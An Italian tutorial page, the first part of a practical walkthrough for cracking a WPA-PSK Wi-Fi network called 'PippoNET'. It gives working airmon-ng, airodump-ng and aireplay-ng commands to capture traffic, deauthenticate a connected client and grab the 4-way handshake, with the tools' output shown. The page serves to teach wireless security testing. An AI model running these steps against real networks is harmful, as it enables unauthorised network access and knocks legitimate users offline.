Nessun risultato. Prova con un altro termine.
Guide
Notizie
Software
Tutorial

Esempio di crack di rete WPA - I

Esempio pratico di un tentativo di cracking di una rete basata sul protocollo di protezione WPA: prima parte
Esempio pratico di un tentativo di cracking di una rete basata sul protocollo di protezione WPA: prima parte
Link copiato negli appunti

Al fine di identificare la pre-shared key della rete PippoNET abbiamo bisogno, come detto, di catturare l'authentication handshake tra client ed access point; anche in questo caso, quindi, dev'esser presente almeno un host connesso.

Come sempre, è possibile attendere fino a quando un client si connetta alla rete oppure forzare la sua disconnessione e sniffare il traffico scambiato tra gli end point alla sua successiva riconnessione.

Naturalmente noi non abbiamo pazienza ed opteremo per questa seconda via, anche se non sempre dà i risultati sperati.

Poniamo la nostra scheda di rete in monitor mode, cosicché ascolti ogni pacchetto Wi-Fi che venga irradiato in aria (e possa iniettare essa stessa pacchetti), direttamente sul canale 11:

airmon-ng start rausb0 11

ed istruiamo airodump-ng di (iniziare a) collezionare gli handshake di autenticazione che capta sul canale 11 per quel dato access point:

airodump-ng -c 11 --bssid  00:49:13:A3:CE:09 -w psk rausb0

CH 11 ][ Elapsed: 1 min ][                                         
                                                                                                       
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID 
                                                                                                       
 00:49:13:A3:CE:09  114 100     1141      911    0  11  54  WPA  TKIP   PSK  PippoNET                 
                                                                                                       
 BSSID              STATION            PWR   Rate  Lost  Packets  Probes                               
                                                                                                       
 00:49:13:A3:CE:09  00:13:02:B2:FA:28  110  54-54     0      916                                       
 00:49:13:A3:CE:09  00:1C:F0:A3:E7:80   -1  54- 0     0        8 

Cerchiamo a questo punto di de-autenticare un client (00:13:02:B2:FA:28); apriamo un'altra shell di root e digitiamo:

aireplay-ng --deauth 5 -a 00:49:13:A3:CE:09 -c 00:13:02:B2:FA:28 rausb0 

Waiting for beacon frame (BSSID: 00:49:13:A3:CE:09) on channel 11 
[...]

In questo modo invieremo messaggi di de-autenticazione all'adattatore di rete dell'host target, il quale non ne controllerà la provenienza e, con fortuna, si sconnetterà.

In caso di successo sulla collezione dell'handshake:

WPA handshake: 00:49:13:A3:CE:09 !! 
WPA handshake: 00:49:13:A3:CE:09 !!

Bene. Siamo riusciti nell'intento di catturare un 4-way handshake e tentiamo ora un brute force basato su dizionario. Seguite la prossima lezione.

Ti consigliamo anche